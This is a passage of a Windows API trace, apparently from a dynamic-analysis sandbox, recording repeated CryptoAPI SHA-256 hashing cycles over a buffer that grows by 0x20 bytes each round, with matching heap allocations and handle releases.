	[0201.702] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.702] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693850
	[0201.702] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693850, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693850, pdwDataLen=0x129424) returned 1
	[0201.702] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.702] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.702] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.702] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.702] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0201.702] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.702] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693878
	[0201.702] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693878, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693878, pdwDataLen=0x129424) returned 1
	[0201.702] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.702] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.702] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.703] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.703] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0201.703] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.703] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26938a0
	[0201.703] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26938a0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26938a0, pdwDataLen=0x129424) returned 1
	[0201.703] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.703] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.703] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.703] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.703] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0201.703] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.703] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26938c8
	[0201.703] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26938c8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26938c8, pdwDataLen=0x129424) returned 1
	[0201.703] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.703] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.703] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.704] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.704] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0201.704] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.704] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26938f0
	[0201.704] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26938f0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26938f0, pdwDataLen=0x129424) returned 1
	[0201.704] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.704] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.704] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.704] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.704] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0201.704] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.704] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693918
	[0201.704] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693918, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693918, pdwDataLen=0x129424) returned 1
	[0201.704] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.704] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.704] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.705] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.705] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0201.705] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.705] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693940
	[0201.705] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693940, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693940, pdwDataLen=0x129424) returned 1
	[0201.705] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.705] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.705] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.705] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.705] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0201.705] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.705] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693968
	[0201.705] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693968, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693968, pdwDataLen=0x129424) returned 1
	[0201.705] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.705] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.705] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.706] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.706] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0201.706] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.706] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693990
	[0201.706] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693990, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693990, pdwDataLen=0x129424) returned 1
	[0201.706] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.706] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.706] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.706] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.706] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0201.706] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.706] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26939b8
	[0201.706] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26939b8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26939b8, pdwDataLen=0x129424) returned 1
	[0201.706] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.706] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.706] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.707] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.707] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0201.707] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.707] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26939e0
	[0201.707] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26939e0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26939e0, pdwDataLen=0x129424) returned 1
	[0201.707] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.707] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.707] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.707] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.707] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0201.707] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.707] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693a08
	[0201.707] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693a08, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693a08, pdwDataLen=0x129424) returned 1
	[0201.707] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.707] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.707] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.708] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.708] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0201.708] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.708] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693a30
	[0201.708] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693a30, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693a30, pdwDataLen=0x129424) returned 1
	[0201.708] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.708] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.708] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.708] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.708] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0201.708] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.708] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693a58
	[0201.708] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693a58, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693a58, pdwDataLen=0x129424) returned 1
	[0201.708] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.708] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.708] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.709] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.709] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0201.709] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.709] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693a80
	[0201.709] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693a80, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693a80, pdwDataLen=0x129424) returned 1
	[0201.709] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.709] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.709] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.709] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.709] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0201.709] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.709] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693aa8
	[0201.709] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693aa8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693aa8, pdwDataLen=0x129424) returned 1
	[0201.709] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.709] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.709] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.710] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.710] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0201.710] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.710] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693ad0
	[0201.710] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693ad0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693ad0, pdwDataLen=0x129424) returned 1
	[0201.710] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.710] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.710] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.710] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.710] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0201.710] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.710] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693af8
	[0201.710] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693af8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693af8, pdwDataLen=0x129424) returned 1
	[0201.710] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.710] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.710] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.711] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.711] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0201.711] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.711] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693b20
	[0201.711] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693b20, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693b20, pdwDataLen=0x129424) returned 1
	[0201.711] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.711] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.711] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.711] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.711] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0201.711] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.711] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693b48
	[0201.711] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693b48, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693b48, pdwDataLen=0x129424) returned 1
	[0201.711] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.711] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.711] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.712] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.712] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0201.712] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.712] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693b70
	[0201.712] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693b70, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693b70, pdwDataLen=0x129424) returned 1
	[0201.712] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.712] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.712] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.712] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.712] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0201.712] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.712] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693b98
	[0201.712] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693b98, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693b98, pdwDataLen=0x129424) returned 1
	[0201.712] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.712] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.712] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.713] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.713] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0201.713] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.713] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693bc0
	[0201.713] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693bc0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693bc0, pdwDataLen=0x129424) returned 1
	[0201.713] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.713] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.713] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.713] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.713] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0201.713] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.713] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693be8
	[0201.713] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693be8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693be8, pdwDataLen=0x129424) returned 1
	[0201.713] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.713] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.714] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.714] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.714] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0201.714] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.714] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693c10
	[0201.714] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693c10, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693c10, pdwDataLen=0x129424) returned 1
	[0201.714] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.714] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.714] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.714] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.714] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0201.714] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.714] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693c38
	[0201.714] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693c38, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693c38, pdwDataLen=0x129424) returned 1
	[0201.714] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.715] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.715] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
